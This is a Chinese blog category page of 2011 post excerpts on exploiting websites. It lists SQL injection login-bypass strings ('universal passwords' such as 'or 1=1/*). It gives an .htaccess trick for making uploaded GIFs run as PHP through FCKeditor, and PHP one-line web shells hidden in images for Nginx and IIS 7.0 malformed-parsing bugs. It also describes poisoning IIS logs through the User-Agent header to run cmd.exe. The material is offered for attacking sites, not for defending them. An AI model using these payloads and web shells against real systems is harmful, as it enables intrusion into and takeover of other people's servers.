【漏洞应用】 - 随笔分类 - WHaa_(T_T)

分析PHP网站下的万能密码

摘要：如果一个网站的前台都是注入漏洞，那么凭经验，万能密码进后台的几率基本上百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启，就会对特殊符号转义，就彻底杜绝了PHP注入。其实说这话的人没有好好想过，更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。如果你用这样的万能密码‘or’=’or’，当然进不去，理由是GPC开启的时候单引号会被转换。PHP注入时我常用的万能密码是：‘or 1=1/*.那我们分析一下为什么这可以进后台。如果sql语句这样写：“SELECT * FROM admin where name=’”.$_POST['nam 阅读全文

posted @ 2011-08-31 20:21 WHaa_(T_T) 阅读(388) 评论(0) 推荐(0)

.htaccess

摘要：1.create a htaccess file: code: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.Now upload this htaccess with FCKeditor. http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/con 阅读全文

posted @ 2011-08-22 03:19 WHaa_(T_T) 阅读(207) 评论(0) 推荐(0)

万能密码

摘要：asp aspx万能密码1："or "a"="a2： ')or('a'='a3：or 1=1--4：'or 1=1--5：a'or' 1=1--6："or 1=1--7：'or'a'='a8："or"="a'='a9：'or''='10：'or'='or'11: 1 or '1'='1'=112: 1 or ' 阅读全文

posted @ 2011-08-03 01:57 WHaa_(T_T) 阅读(258) 评论(0) 推荐(0)

Nginx那个0day,IIS7.0的畸形解析和这个类似。

摘要：Nginx那个0day（出来有几天了，因为介绍的网站很多，所以当时就没转载）先合并一张PHP一句话图片马，合并方法：①、DOS合并：copy1.gif/b+1.txt/aasp.gif②、用edjpgcom，进行图片和一句话木马的合并，一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"图片随便找一张.一句话:<?phpfputs(fopen('shell.php','w' 阅读全文

posted @ 2011-07-19 05:48 WHaa_(T_T) 阅读(361) 评论(0) 推荐(0)

or1=1脚本分析

摘要：先用or 1=1和or 1=2来测试是否存在注入点，我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面，我们再来测试or 1=2。返回的是正常的页面，说明猜测正确的时候是错误，猜测错误的时候是正常，这就是真正的"假是真时真是假"，比lake2大哥哥的IP欺骗更经典哦，呵呵。我们来构造测试语句：vpro.asp?id=1 or exists(select * from admin) 返回错误页面，说明存在admin表我们来换一个表试试！vpro.asp?id=1 or exists(select * from n0h4ck) 说明不存阅读全文

posted @ 2011-06-06 12:59 WHaa_(T_T) 阅读(532) 评论(0) 推荐(0)

OR进后台的集锦

摘要：SQL injection strings(DB type doesn't matter)') OR ('a' = 'a') OR ('1'-'1'or''='' OR '1=1admin'--' or 0=0 --" or 0=0 --or 0=0 --' or 0=0 #" or 0=0 #or 0=0 #' or 'x'='x" or "x"="x' 阅读全文

posted @ 2011-06-02 12:17 WHaa_(T_T) 阅读(186) 评论(0) 推荐(0)

已知一个iis漏洞可以让php解释任意的给定文件

摘要：已知一个iis漏洞可以让php解释任意的给定文件。挑战：怎么执行任意命令?应用环境：防火墙配置不准许对外连接。要求：不能要求上传文件。总算看到一次答案了：http://www.inbreak.net/kxlzxtest/phpiis.txtC:\Windows\System32\LogFiles\w3svcXXXX让php解析当天访问日志，然后用get请求提交user agent为 User-Agent: <?php system("cmd.exe");?>于是当天日志加入了 2011-01-01 16:25:06 W3SVC1 10.247.186.114 G 阅读全文

posted @ 2011-04-27 16:29 WHaa_(T_T) 阅读(350) 评论(0) 推荐(0)

IIS7.0 畸形解析

摘要：1.jpg 内容“<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>”www.xxxx.com/upload/1.jpg www.xxxx.com/upload/1.jpg/shell.php 访问后生成下面的一句话www.xxxx.com/upload/shell.phpIIS7.0的畸形解析和这个类似。找到某个使用IIS7.0架设的站，把PHP大马后缀改成.jpg，传上去，得到图片地址。在图片格式后面添加xx.php随便你怎么填。只要后缀为.php就好. 阅读全文

posted @ 2011-04-27 16:10 WHaa_(T_T) 阅读(358) 评论(0) 推荐(0)

T_T

随笔分类 - 【漏洞应用】

公告